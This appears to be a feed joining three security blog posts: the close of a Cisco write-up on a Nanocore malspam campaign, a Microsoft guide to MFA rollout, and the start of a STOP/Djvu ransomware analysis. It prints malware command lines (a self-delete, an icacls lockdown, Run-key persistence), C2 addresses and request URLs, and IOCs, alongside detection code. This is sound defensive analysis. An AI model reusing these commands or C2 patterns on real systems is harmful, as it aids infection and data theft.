    2. MITRE tracks this common technique as T1121 indicating, “Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration”
    3. We saw this technique in the app.any.run sandbox report.
  • The frequency of the event:
    1. The event was occurring every second, indicating some sort of command and control or heartbeat activity.

 

Mount Up and Drop Out

 

At this point in the investigation, we have now uncovered a previously unseen suspicious file: “DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe”, which is strangely located in the \Device\CdRom0\ directory, and the original “filename.exe” used to establish persistence.

The first event in this process chain shows explorer.exe spawning the malware from the D: drive.

Process Information:
 New Process ID:  0x2ba0
 New Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe
 Token Elevation Type: %%1938
 Mandatory Label:  Mandatory Label\Medium Mandatory Level
 Creator Process ID: 0x28e8
 Creator Process Name: C:\Windows\explorer.exe
 Process Command Line: "D:\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe"

Figure 6: Additional processes spawned by the fake PDF

 

The following event is the same one that originally caught our attention, which shows the malware spawning RegAsm.exe (eventually revealed to be Nanocore) to establish communication with the command and control server:

 

Process Information:
 New Process ID:  0x4128
 New Process Name: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
 Token Elevation Type: %%1938
 Mandatory Label:  Mandatory Label\Medium Mandatory Level
 Creator Process ID: 0x2ba0
 Creator Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe
 Process Command Line: "C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

Figure 7: RegAsm reaching out to command and control servers

 

Finally, the malware spawns cmd.exe and deletes the original binary using the built-in choice command: 

Process Information:
 New Process ID:  0x2900
 New Process Name: C:\Windows\SysWOW64\cmd.exe
 Token Elevation Type: %%1938
 Mandatory Label:  Mandatory Label\Medium Mandatory Level
 Creator Process ID: 0x2ba0
 Creator Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe
 Process Command Line: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "D:\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe"

Figure 8: Evidence of deleting the original dropper.

 

At this point in the investigation of the original dropper and the subsequent suspicious files, we still could not answer how the malware ended up on this user’s computer in the first place. However with the filename of the original dropper to pivot with, a quick web search for the filename turned up a thread on Symantec.com from a user asking for assistance with the file in question. In this post, they write that they recognize the filename from a malspam email they received. Based on the Symantec thread and other clues, such as the use of the shipping service DHL in the filename, we now know the delivery method is likely via email.

Delivery Method Techniques

We used the following Splunk query to search our Email Security Appliance logs for the beginning of the filename we found executing RegAsm.exe in the Windows Event Logs.

index=esa earliest=-30d
    [search index=esa "DHL*.img" earliest=-30d
    | where isnotnull(cscoMID)
    | fields + cscoMID,host
    | format]
| transaction cscoMID,host
| eval wasdelivered=if(like(_raw, "%queued for delivery%"), "yes", "no")
| table esaTo, esaFrom, wasdelivered, esaSubject, esaAttachment, Size, cscoMID, esaICID, esaDCID, host

Figure 9: Splunk query looking for original DHL files.

As expected, the emails all came from the spoofed sender address noreply@dhl.com with some variation of the subject “Re: DHL Notification / DHL_AWB_0011179303/ ETD”. In total, CSIRT identified 459 emails from this campaign sent to our users. Of those 459 emails, 396 were successfully delivered and contained 18 different Nanocore samples.

396 malicious emails making it past our well-tuned and automated email mitigation tools is no easy feat. While the lure the attacker used to social engineer their victims was common and unsophisticated, the technique they employed to evade defenses was successful – for a time.

Detecting the Techniques

During the lessons learned phase after this campaign, CSIRT developed numerous incident response detection rules to alert on newly observed techniques discovered while analyzing this incident. The first and most obvious is detecting malicious disk image files successfully delivered to a user’s inbox. The false-positive rate for this specific type of attack is low in our environment, with a few exceptions here and there that are easily tuned out based on the sender. This play could be tuned to look only for disk image files with a small file size if they are more prevalent in your environment.

Another valuable detection rule we developed after this incident is monitoring for suspicious usage (network connections) of the registry assembly executable on our endpoints, which is ultimately the process Nanocore injected itself into and was using to facilitate C2 communication. Also, it is pretty unlikely to ever see legitimate use of the choice command to create a self-destructing binary of sorts, so monitoring for execution of choice with the command-line arguments we saw in the Windows Event above should be a high fidelity alert.
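The four reasons the original event stood out (mounted-image path, document-lookalike filename, RegAsm spawned by an untrusted parent, and the choice-delayed self-delete described in Figure 8 and the paragraph above) translate directly into rules over process-creation events. The following is an added example of those rules, not Cisco CSIRT's detection content. SAMPLE_LOG copies the three "Process Information" blocks from Figures 6 to 8 and adds one constructed benign RegAsm launch by an installer; the parent allow-list for RegAsm/Regsvcs and the lure-extension list are assumptions to tune per environment.

```python
"""Detection rules over Windows process-creation events from the investigation.

Added example, not Cisco CSIRT's detection content. SAMPLE_LOG copies the three
"Process Information" blocks shown in the write-up and adds one constructed
benign block. The parent allow-list for RegAsm/Regsvcs and the lure-extension
list are assumptions to be tuned per environment.
"""
import re

SAMPLE_LOG = r"""
Process Information:
 New Process ID:  0x2ba0
 New Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe
 Token Elevation Type: %%1938
 Mandatory Label:  Mandatory Label\Medium Mandatory Level
 Creator Process ID: 0x28e8
 Creator Process Name: C:\Windows\explorer.exe
 Process Command Line: "D:\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe"

Process Information:
 New Process ID:  0x4128
 New Process Name: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
 Token Elevation Type: %%1938
 Mandatory Label:  Mandatory Label\Medium Mandatory Level
 Creator Process ID: 0x2ba0
 Creator Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe
 Process Command Line: "C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

Process Information:
 New Process ID:  0x2900
 New Process Name: C:\Windows\SysWOW64\cmd.exe
 Token Elevation Type: %%1938
 Mandatory Label:  Mandatory Label\Medium Mandatory Level
 Creator Process ID: 0x2ba0
 Creator Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe
 Process Command Line: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "D:\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe"

Process Information:
 New Process ID:  0x1a2c
 New Process Name: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
 Token Elevation Type: %%1938
 Mandatory Label:  Mandatory Label\Medium Mandatory Level
 Creator Process ID: 0x0f10
 Creator Process Name: C:\Windows\System32\msiexec.exe
 Process Command Line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" C:\Program Files\ExampleVendor\Plugin.dll
"""

# A mounted .img/.iso surfaces as a CD-ROM device object in the event log.
DEVICE_MOUNT = re.compile(r"^\\Device\\CdRom\d+\\", re.I)
# Executables named to look like documents (assumed list of lure extensions).
LURE_SUFFIX = re.compile(r"_(pdf|doc|docx|xls|xlsx|jpg)\.exe$", re.I)
# "choice ... /T n" used as a sleep, followed by Del: self-deleting dropper.
SELF_DELETE = re.compile(r"\bchoice\b.*?/T\s*\d+.*?&\s*del\b", re.I)
PROXY_BINARIES = {"regasm.exe", "regsvcs.exe"}
# Parents from which RegAsm/Regsvcs execution is expected (assumption; tune locally).
EXPECTED_PROXY_PARENTS = {"msiexec.exe", "devenv.exe", "msbuild.exe", "setup.exe"}


def parse_events(text):
    """Split the log into one dict per 'Process Information:' block."""
    events, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Process Information:":
            current = {}
            events.append(current)
            continue
        if current is None or ":" not in line:
            continue
        key, value = line.split(":", 1)
        current[key.strip()] = value.strip()
    return events


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the detection reasons that fire for one process-creation event."""
    findings = []
    new = event.get("New Process Name", "")
    creator = event.get("Creator Process Name", "")
    cmdline = event.get("Process Command Line", "")
    if DEVICE_MOUNT.match(new):
        findings.append("executable launched from a mounted disk image")
    if LURE_SUFFIX.search(new):
        findings.append("document-lookalike executable name")
    if basename(new) in PROXY_BINARIES and basename(creator) not in EXPECTED_PROXY_PARENTS:
        findings.append("RegAsm/Regsvcs spawned by unexpected parent (T1121)")
    if basename(new) == "cmd.exe" and SELF_DELETE.search(cmdline):
        findings.append("choice-delayed self-deletion of a binary")
    return findings


def analyze(text):
    """Return [(new process id, findings)] for every event that triggers at least one rule."""
    results = []
    for event in parse_events(text):
        findings = evaluate(event)
        if findings:
            results.append((event.get("New Process ID"), findings))
    return results


if __name__ == "__main__":
    for pid, findings in analyze(SAMPLE_LOG):
        print(pid, findings)
```

The RegAsm rule keys on the parent rather than on RegAsm itself, because the binary is a legitimate .NET tool that installers do run; the same rule applied to the sample log stays quiet on the constructed msiexec launch and fires on the one whose parent lives under \Device\CdRom0. The self-delete rule is the high-fidelity one the paragraph above anticipates: choice used as a timer ahead of Del has essentially no legitimate interactive use.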

Some additional, universal takeaways from this incident:

  1. Auto-mitigation tools should not be treated as a silver bullet – Effective security monitoring, rapid incident response, and defense in depth/layers is more important.
  2. Obvious solutions such as blocking extensions at email gateway are not always realistic in large, multifunction enterprises – .IMG files were legitimately being used by support engineers and could not be blocked.
  3. Malware campaigns can slip right past defenders on occasion, so a wide playbook that focuses on how attackers operate and infiltrate (TTPs) is key for finding new and unknown malware campaigns in large enterprises (as opposed to relying exclusively on indicators of compromise.)

 

Indicators Of Compromise (IOCS)

2b6f19fac64c847258fe776a2ea6444cc469ac6a348e714fcab23cc6cb2c5b74

327c646431a644192aae8a0d0ebe75f7a2b98d7afa7a446afa97e2a004ca64b0

3718957d7f0da489935ce35b6587a6c93f25cff69d233381131b757778826da3

3873ef89a74a9c03ba363727b20429a45f29a525532d0ef9027fce2221f64f60

3a7c23a01a06c257b2f5b59647461ebf8f58209a598390c2910d20a9c5757c62

4eb2af63e121c22df7945258991168be4a70aa32669db173743701aab94383fb

5d14e5959c05589978680e46bffd586e10c1fcabc21ddd94c713520cd0037640

6a2af44e186531d07c53122d42280bc18929d059b98f0449c1a646d66a778ffb

80ab695da86e97861b294b72ba1ef2e8e2f322e7ec0d0834e71f92497515b63d

a34aa05710cf0afb111181c23468c2dcc3a2c2d6aa496c9dffe45dde11e2c4d1

abf41ea1909a39c644e5b480b176ef8a3c4a80e2ee8b447d4320e777384392cf

af5d9ca1ed166a8d378c5b5ed7e187035f374b4376bdd632c3a2ee156613fd29

afb87da69c9ad418ac29af27602a450a7eae63132443c7bc56ab17785dd3bbfd

d871704baad496b47b15da54e7766c0a468ac66337d99032908ad7d4732ecffb

da79495b8b75c9b122a1116494f68661ec45a1fdfb8fd39c000f1f691b39bc13

deb805ce329f17a48165328879b854674eb34abd704eeb575e643574f31d3e83

eaee0577806861c23bef8737e5ba2d315e9c6bfa38bf409dda9a2a13599615b4

fc0cf381e433cd578128be91dfd7567d2294a6d3ff4d2ce0e3f4046442b1f5f0

185.101.94.172:8166

The post Disk Image Deception appeared first on Cisco Blogs.

How to implement Multi-Factor Authentication (MFA)

Another day, another data breach. If the regular drumbeat of leaked and phished accounts hasn’t persuaded you to switch to Multi-Factor Authentication (MFA) already, maybe the usual January rush of ‘back to work’ password reset requests is making you reconsider. When such an effective option for protecting accounts is available, why wouldn’t you deploy it straight away?

The problem is that deploying MFA at scale is not always straightforward. There are technical issues that may hold you up, but the people side is where you have to start. The eventual goal of an MFA implementation is to enable it for all your users on all of your systems all of the time, but you won’t be able to do that on day one.

To successfully roll out MFA, start by being clear about what you’re going to protect, decide what MFA technology you’re going to use, and understand what the impact on employees is going to be. Otherwise, your MFA deployment might grind to a halt amid complaints from users who run into problems while trying to get their job done.

Before you start on the technical side, remember that delivering MFA across a business is a job for the entire organization, from the security team to business stakeholders to IT departments to HR and to corporate communications and beyond, because it has to support all the business applications, systems, networks and processes without affecting workflow.

Campaign and train

Treat the transition to MFA like a marketing campaign where you need to sell employees on the idea—as well as provide training opportunities along the way. It’s important for staff to understand that MFA is there to support them and protect their accounts and all their data, because that may not be their first thought when met with changes to the way they sign in to the tools they use every day. If you run an effective internal communications campaign that makes it clear to users what they need to do and, more importantly, why they need to do it, you’ll avoid them seeing MFA as a nuisance or misunderstanding it as ‘big brother’ company tracking.

The key is focusing on awareness: in addition to sending emails—put up posters in the elevator, hang banner ads in your buildings, all explaining why you’re making the transition to MFA. Focus on informing your users, explaining why you’re making this change—making it very clear what they will need to do and where they can find instructions, documentation, and support.

Also, provide FAQs and training videos, along with optional training sessions or opportunities to opt in to an early pilot group (especially if you can offer them early access to a new software version that will give them features they need). Recognize that MFA is more work for them than just using a password, and that they will very likely be inconvenienced. Unless you are able to use biometrics on every device they will have to get used to carrying a security key or a device with an authenticator app with them all the time, so you need them to understand why MFA is so important.

It’s not surprising that users can be concerned about a move to MFA. After all, MFA has sometimes been done badly in the consumer space. They’ll have seen stories about social networks abusing phone numbers entered for security purposes for marketing or of users locked out of their accounts if they’re travelling and unable to get a text message. You’ll need to reassure users who have had bad experiences with consumer MFA and be open to feedback from employees about the impact of MFA policies. Like all tech rollouts, this is a process.

If you’re part of an international business you have more to do, as you need to account for global operations. That needs wider buy-in and a bigger budget, including language support if you must translate training and support documentation. If you don’t know where to start, Microsoft provides communication templates and user documentation you can customize for your organization.

Start with admin accounts

At a minimum, you want to use MFA for all your admins, so start with privileged users. Administrative accounts are your highest value targets and the most urgent to secure, but you can also treat them as a proof of concept for wider adoption. Review who these users are and what privileges they have—there are probably more accounts than you expect with far more privileges than are really needed.

At the same time, look at key business roles where losing access to email—or having unauthorized emails sent—will have a major security impact. Your CEO, CFO, and other senior leaders need to move to MFA to protect business communications.

Use what you’ve learned to roll out MFA to high value groups to plan a pilot deployment—which includes employees from across the business who require different levels of security access—so your final MFA deployment is optimized for mainstream employees without hampering the productivity of those working with more sensitive information, whether that’s the finance team handling payroll or developers with commit rights. Consider how you will cover contractors and partners who need access as well.

Plan for wider deployment

Start by looking at what systems you have that users need to sign in to that you can secure with MFA. Remember that includes on-premises systems—you can incorporate MFA into your existing remote access options, using Active Directory Federation Services (AD FS), or Network Policy Server and use Azure Active Directory (Azure AD) Application Proxy to publish applications for cloud access.

Concentrate on finding any networks or systems where deploying MFA will take more work (for example, if SAML authentication is used) and especially on discovering vulnerable apps that don’t support anything except passwords because they use legacy or basic authentication. This includes older email systems using MAPI, EWS, IMAP4, POP3, SMTP, internal line of business applications, and elderly client applications. Upgrade or update these to support modern authentication and MFA where you can. Where this isn’t possible, you’ll need to restrict them to use on the corporate network until you can replace them, because critical systems that use legacy authentication will block your MFA deployment.

Be prepared to choose which applications to prioritize. As well as an inventory of applications and networks (including remote access options), look at processes like employee onboarding and approval of new applications. Test how applications work with MFA, even when you expect the impact to be minimal. Create a new user without admin access, use that account to sign in with MFA and go through the process of configuring and using the standard set of applications staff will use to see if there are issues. Look at how users will register for MFA and choose which methods and factors to use, and how you will track and audit registrations. You may be able to combine MFA registration with self-service password reset (SSPR) in a ‘one stop shop,’ but it’s important to get users to register quickly so that attackers can’t take over their account by registering for MFA, especially if it’s for a high-value application they don’t use frequently. For new employees, you should make MFA registration part of the onboarding process.

Make MFA easier on employees

MFA is always going to be an extra step, but you can choose MFA options with less friction, like using biometrics in devices or FIDO2 compliant factors such as Feitian or Yubico security keys. Avoid using SMS if possible. Phone-based authentication apps like the Microsoft Authenticator App are an option, and they don’t require a user to hand over control of their personal device. But if you have employees who travel to locations where they may not have connectivity, choose OATH verification codes, which are generated on the device, rather than push notifications, which are usually convenient but require the user to be online. You can even use automated voice calls: letting users press a button on the phone keypad is less intrusive than giving them a passcode to type in on screen.

Offer a choice of alternative factors so people can pick the one that best suits them. Biometrics are extremely convenient, but some employees may be uncomfortable using their fingerprint or face for corporate sign-ins and may prefer receiving an automated voice call.

Make sure that you include mobile devices in your MFA solution, managing them through Mobile Device Management (MDM), so you can use conditional and contextual factors for additional security.

Avoid making MFA onerous; choose when the extra authentication is needed to protect sensitive data and critical systems rather than applying it to every single interaction. Consider using conditional access policies and Azure AD Identity Protection, which allows for triggering two-step verification based on risk detections, as well as pass-through authentication and single-sign-on (SSO).

If MFA means that a user accessing a non-critical file share or calendar on the corporate network from a known device that has all the current OS and antimalware updates sees fewer challenges—and no longer faces the burden of 90-day password resets—then you can actually improve the user experience with MFA.

Have a support plan

Spend some time planning how you will handle failed sign-ins and account lockouts. Even with training, some failed sign-ins will be legitimate users getting it wrong and you need to make it easy for them to get help.

Similarly, have a plan for lost devices. If a security key is lost, the process for reporting that needs to be easy and blame free, so that employees will notify you immediately so you can expire their sessions and block the security key, and audit the behavior of their account (going back to before they notified you of the loss). Security keys that use biometrics may be a little more expensive, but if they’re lost or stolen, an attacker can’t use them. If possible, make it a simple, automated workflow, using your service desk tools.

You also need to quickly get them connected another way so they can get back to work. Automatically enrolling employees with a second factor can help. Make that second factor convenient enough to use that they’re not unable to do their job, but not so convenient that they keep using it and don’t report the loss: one easy option is allowing one-time bypasses. Similarly, make sure you’re set up to automatically deprovision entitlements and factors when employees change roles or leave the organization.

Measure and monitor

As you deploy MFA, monitor the rollout to see what impact it has on both security and productivity and be prepared to make changes to policies or invest in better hardware to make it successful. Track security metrics for failed login attempts, credential phishing that gets blocked and privilege escalations that are denied.

Your MFA marketing campaign also needs to continue during and after deployment, actively reaching out to staff and asking them to take part in polls or feedback sessions. Start that with the pilot group and continue it once everyone is using MFA.

Even when you ask for it, don’t rely on user feedback to tell you about problems. Check helpdesk tickets, logs, and audit options to see if it’s taking users longer to get into systems, or if they’re postponing key tasks because they’re finding MFA difficult, or if security devices are failing or breaking more than expected. New applications and new teams in the business will also mean that MFA deployment needs to be ongoing, and you’ll need to test software updates to see if they break MFA; you have to make it part of the regular IT process.

Continue to educate users about the importance of MFA, including running phishing training and phishing your own employees (with more training for those who are tricked into clicking through to fake links).

MFA isn’t a switch you flip; it’s part of a move to continuous security and assessment that will take time and commitment to implement. But if you approach it in the right way, it’s also the single most effective step you can take to improve security.

About the authors

Ann Johnson is the Corporate Vice President for Cybersecurity Solutions Group for Microsoft. She is a member of the board of advisors for FS-ISAC (The Financial Services Information Sharing and Analysis Center), an advisory board member for EWF (Executive Women’s Forum on Information Security, Risk Management & Privacy), and an advisory board member for HYPR Corp. Ann recently joined the board of advisors for Cybersecurity Ventures

Christina Morillo is a Senior Program Manager on the Azure Identity Engineering Product team at Microsoft. She is an information security and technology professional with a background in cloud technologies, enterprise security, and identity and access. Christina advocates and is passionate about making technology less scary and more approachable for the masses. When she is not at work, or spending time with her family, you can find her co-leading Women in Security and Privacy’s NYC chapter and supporting others as an advisor and mentor. She lives in New York City with her husband and children.

Learn more

To find out more about Microsoft’s Cybersecurity Solutions, visit the Microsoft Security site, or follow Microsoft Security on Twitter at Microsoft Security Twitter or Microsoft WDSecurity Twitter.

To learn more about Microsoft Azure Identity Management solutions, visit this Microsoft overview page and follow our Identity blog. You can also follow us @AzureAD on Twitter.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How to implement Multi-Factor Authentication (MFA) appeared first on Microsoft Security.

STOP (Djvu) Ransomware: Ransom For Your Shady Habits!

Estimated reading time: 9 minutes

With almost 200 extensions, STOP (djvu) ransomware can be said to be 2019’s most active and widespread ransomware. Although this ransomware was active a year before, it started its campaign aggressively in early 2019. To evade detection, it has been continuously changing its extensions and payloads. For earlier infections, data recovery was easier if the key was not online CnC generated. Once payload was received, decryption was easier as it used non-symmetric encryption algorithms and for offline systems, it used the same set of keys. There has been a change in its encryption strategy from mid-2019, which made the decryption of infected files difficult. By observing continuous improvement in infection vectors and payloads, one can consider STOP actors to be one of the most active malware authors of 2019.

Here, we will discuss in detail about its behavior and updated file encryption technique. We will also go through its parallel activities of downloading other malware and their behavior. The statistics would elaborate its prominence in the last few months.

Infection Vectors:

According to our telemetry, this ransomware is seen spreading through cracked applications, keygens, activators, fake application setup and fake windows updates. While taking a look at the infection vectors and the ransom demanded, we can say that these actors believed in quantity instead of quality like Ryuk did. According to our observations, cracked files or fake activators for different software like Tally, Autocad, Adobe Photoshop, Internet Download Manager, Microsoft Office, Opera browser, VMware Workstation, Quick Heal Total Security, etc. were seen spreading this ransomware.

Payload Behaviour:

Fig. 1: ProcessMap

The main payload of STOP (djvu) has lots of anti-emulation and anti-debugging techniques implemented by its common wrapper, which is believed to be used for most of the payloads. Few of the ransomware are seen avoiding encryption for a particular set of countries, depending on the region of their origin and strength of victims to pay the ransom. For that, we have observed the use of keyboard layouts to identify the country of the victim system. Here, STOP authors did not rely on legacy techniques as there might be a chance of error. The payload checks for the location of the system by visiting “https[:]//api.2ip.ua/geo.json” where in response we get information about the location and timezone of the system.

In response to this request, details of location including longitude, latitude, timezone along with country and city are received.

Fig. 2: IP Response

The retrieved country code is compared with a few other country codes. If it matches with any of the listed country codes, the payload does not execute further. The image below shows the country code comparison before encryption.

Fig. 3: Country Code Comparison

Once it confirms that the victim is not from one of the listed countries, it creates a folder named with a UUID or GUID under the “%AppData%\Local\” directory. The payload then copies itself to this location and changes the access controls of the copy using ‘icacls’ with the following command:

“icacls \”%AppData%\\Local\\{UuId}\” /deny *S-1-1-0:(OI)(CI)(DE,DC)”

Where OI: Object Inherit, CI: Container Inherit, DE: Delete, DC: Delete Child

Again after this, payload runs itself from its original location by elevating access rights as admin using

<Directory Path>\ewrewexcf.exe –Admin IsNotAutoStart IsNotTask 

Further, it terminates the parent process. The parameters confirm that the process was initiated neither by an autostart program nor as a scheduled task, and that it is running as admin. This newly executed process creates a task scheduler entry via the Task Scheduler COM interface at:

C:\Windows\System32\Tasks\Time Trigger Task

Fig. 4: Time Trigger Task

Then it retrieves the MAC address of the system using GetAdaptersInfo(). An MD5 hash of this MAC address is then calculated using Windows Crypto APIs and is then used to uniquely identify the system. A request is sent to malicious CnC using this MD5 hash, which gets RSA-2048 public key and system encryption identifier i.e. personal ID as a response.

Request format:

http://ring2[.]ug/As73yhsyU34578hxxx/SDf565g/get.php?pid={Mac Address_MD5}&first=true

This response is stored in %AppData%\Local\bowsakkdestx.txt. This key is further used in file encryption, which we will discuss later. Also, the ID received along with the public key is stored in C:\SystemID\PersonalID.txt for future reference.

While receiving personal ID and public key, the ransomware payload also downloads a couple of other malware from the CnC server. It consists of infamous info-stealer i.e. Vidar and a trojan payload which is similar to previously seen Vilsel.

Fig. 5: File Download Requests

In Fig.5, ‘5.exe’ was downloaded and it is one of the Vidar payloads, while ‘updatewin1.exe’ was Vilsel. The lateral activity of these components will be discussed later.

For persistence, along with time trigger task, it also creates one RUN registry entry:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “SysHelper” = “%AppData%\Local\{UuId}\34efcdsax.exe” –AutoStart

It drops the ransom note into the directories it has enumerated. Before the encryption process starts, a mutex {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} is created. This mutex is common throughout the STOP-Djvu campaign.

It particularly checks for the presence of file I:\5d2860c89d774.jpg and if present, it encrypts this file.

File Encryption:

File encryption involves 2 types:

  • Encryption with Online Key
  • Encryption with Offline Key

In the first scenario, the payload tries to establish a connection with the CnC by sending a request for the server-generated public key and ID, using the MD5 hash of the system’s MAC address as the identifier. The response is saved in bowsakkdestx.txt, and this key is later used for file encryption.

In the second case, if STOP ransomware is not able to get a response from the CnC, it checks for the existence of bowsakkdestx.txt in the ‘%AppData%/Local’ directory. If the file is found, it checks for the ‘Public Key’ keyword in it. If the file does not contain a public key, the payload deletes the file and again checks for the CnC response; otherwise it uses the public key and ID already present in the file. Most of the strings in the payload are stored in encrypted form, i.e. XORed with the byte key 0x80. Recent STOP payloads carry an offline ID, which is formed by appending “t1” to the extension name.

Example: Z4aT0c1B4eHWZwaTg43eRzyM1gl3ZaaNVHrecot1

A few file types and directories are skipped by the encryption process, based on path and file extension.

Extensions excluded:

.sys .ini .dll .blf .bat .lnk .regtrans-ms

Along with the above extensions, the extension the payload appends to mark encrypted files is also skipped.

Files Excluded:

ntuser.dat  ntuser.dat.LOG1  ntuser.dat.LOG2  ntuser.pol  _readme.txt

Folders in the Windows directory and browser folders in the Program Files directory are excluded from encryption.

Before encrypting a file, it also checks for the encryption marker “{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}”, which sits at the end of the file after the encryption ID.

While encrypting a file, it leaves the first 5 bytes of the file unchanged. The rest of the file data is encrypted with the Salsa20 algorithm, using a freshly generated UUID as the Salsa20 key. In this way each file gets a new UUID and therefore a unique encryption key. An example Salsa20 key is shown below.

Fig. 6: Salsa20 Key

After the file data has been encrypted, the UUID used as the Salsa20 key is itself encrypted with the RSA-2048 public key received from the CnC server; in the offline case this key is taken from the payload itself. The encrypted UUID is appended after the encrypted file data, followed by the personal ID that was received from the server together with the RSA-2048 public key. If files are encrypted offline, the personal ID is also retrieved from the file and is common to all offline-infected victims. Finally, the encryption marker ‘{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}’ is written at the end of the file.

Fig. 7: File Encryption Structure
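As an added illustration of the on-disk layout described above (triage code written for this page, not Seqrite’s tooling and not the malware’s own code), the following Python parses a file from the end backwards: marker, personal ID, RSA-encrypted Salsa20 key, ciphertext, and the 5-byte plaintext header. Two values are assumptions not stated on the page: the personal ID is taken to be 40 characters long like the example ID quoted earlier, and the encrypted key block is taken to be a raw 256-byte RSA-2048 ciphertext. The sample file is constructed with placeholder bytes in place of real Salsa20/RSA output. A useful point for responders that the parser makes concrete: because the first 5 bytes survive in plaintext, the original file type can still be recognized from its magic bytes, and the personal ID at the tail tells you whether the offline key (ID ending in “t1”) was used.

```python
"""Triage parser for the STOP/Djvu encrypted-file layout (added example, not the malware's code)."""
import os

# Values taken from the write-up above
ENCRYPTION_MARKER = b"{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}"
PLAINTEXT_HEADER_LEN = 5          # the first 5 bytes of the original file stay unencrypted
OFFLINE_ID_SUFFIX = "t1"          # offline personal IDs end in "t1"
# Assumptions (not stated on the page): raw RSA-2048 ciphertext is 256 bytes, and the
# personal ID is 40 characters like the example ID quoted in the text.
RSA_BLOCK_LEN = 256
PERSONAL_ID_LEN = 40

# Magic numbers used to recover the probable original type from the plaintext header.
MAGIC_PREFIXES = {
    b"%PDF-": "pdf",
    b"\x89PNG\r": "png",
    b"PK\x03\x04": "zip/office-xml",
    b"\xd0\xcf\x11\xe0\xa1": "ole2",   # legacy .doc/.xls
    b"\x7fELF": "elf",
    b"MZ": "pe",
}


def guess_original_type(header: bytes) -> str:
    """Map the 5 surviving plaintext bytes to a probable original file type."""
    for magic, name in MAGIC_PREFIXES.items():
        if header.startswith(magic[:PLAINTEXT_HEADER_LEN]):
            return name
    return "unknown"


def parse_stop_file(data: bytes):
    """Describe a STOP-encrypted file, or return None if the layout does not match."""
    if not data.endswith(ENCRYPTION_MARKER):
        return None
    body = data[: -len(ENCRYPTION_MARKER)]
    if len(body) < PLAINTEXT_HEADER_LEN + RSA_BLOCK_LEN + PERSONAL_ID_LEN:
        return None
    personal_id_raw = body[-PERSONAL_ID_LEN:]          # personal ID sits just before the marker
    body = body[:-PERSONAL_ID_LEN]
    encrypted_key = body[-RSA_BLOCK_LEN:]              # RSA-encrypted per-file Salsa20 key (UUID)
    body = body[:-RSA_BLOCK_LEN]
    header, ciphertext = body[:PLAINTEXT_HEADER_LEN], body[PLAINTEXT_HEADER_LEN:]
    personal_id = personal_id_raw.decode("ascii", errors="replace")
    return {
        "personal_id": personal_id,
        "offline": personal_id.endswith(OFFLINE_ID_SUFFIX),
        "encrypted_key_len": len(encrypted_key),
        "ciphertext_len": len(ciphertext),
        "plaintext_header": header,
        "original_type": guess_original_type(header),
    }


def build_sample(plaintext: bytes, personal_id: str) -> bytes:
    """Construct a file in the described layout for testing.

    The Salsa20 and RSA steps are replaced by placeholders (a fixed XOR and a constant
    block); this is deliberately NOT an implementation of the ransomware's cryptography.
    """
    header, rest = plaintext[:PLAINTEXT_HEADER_LEN], plaintext[PLAINTEXT_HEADER_LEN:]
    fake_ciphertext = bytes(b ^ 0x5A for b in rest)
    fake_rsa_block = bytes(range(RSA_BLOCK_LEN))
    return header + fake_ciphertext + fake_rsa_block + personal_id.encode("ascii") + ENCRYPTION_MARKER


def triage_directory(path: str) -> dict:
    """Walk a directory and summarize which files carry the STOP layout and which IDs they use."""
    summary = {"encrypted": 0, "ids": set(), "offline": 0}
    for root, _dirs, files in os.walk(path):
        for name in files:
            try:
                with open(os.path.join(root, name), "rb") as fh:
                    info = parse_stop_file(fh.read())
            except OSError:
                continue
            if info:
                summary["encrypted"] += 1
                summary["ids"].add(info["personal_id"])
                summary["offline"] += int(info["offline"])
    return summary


if __name__ == "__main__":
    sample = build_sample(b"%PDF-1.7 constructed sample", "Z4aT0c1B4eHWZwaTg43eRzyM1gl3ZaaNVHrecot1")
    print(parse_stop_file(sample))
```

`triage_directory` reads whole files, which is fine for a triage pass over a user profile; for a large share you would read only the tail (marker plus ID plus key block) and skip the ciphertext length. A single personal ID across all encrypted files, ending in “t1”, is the offline case in which free decryptors have historically been possible; several distinct IDs on one host point to repeated infections.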

 

Lateral Activity:

     1. Vidar (5.exe)

Vidar is a known info-stealer trojan which collects sensitive information from the infected system and delivers it to its CnC. The information it may steal includes:

  • Browser Login Data, History, Cookies
  • Browser Cache
  • System Information
  • Messaging/Email software data
  • Two-factor authentication software data

It checks for the presence of various browsers and software including two-factor authentication tools.

Fig. 8: Vidar File Access

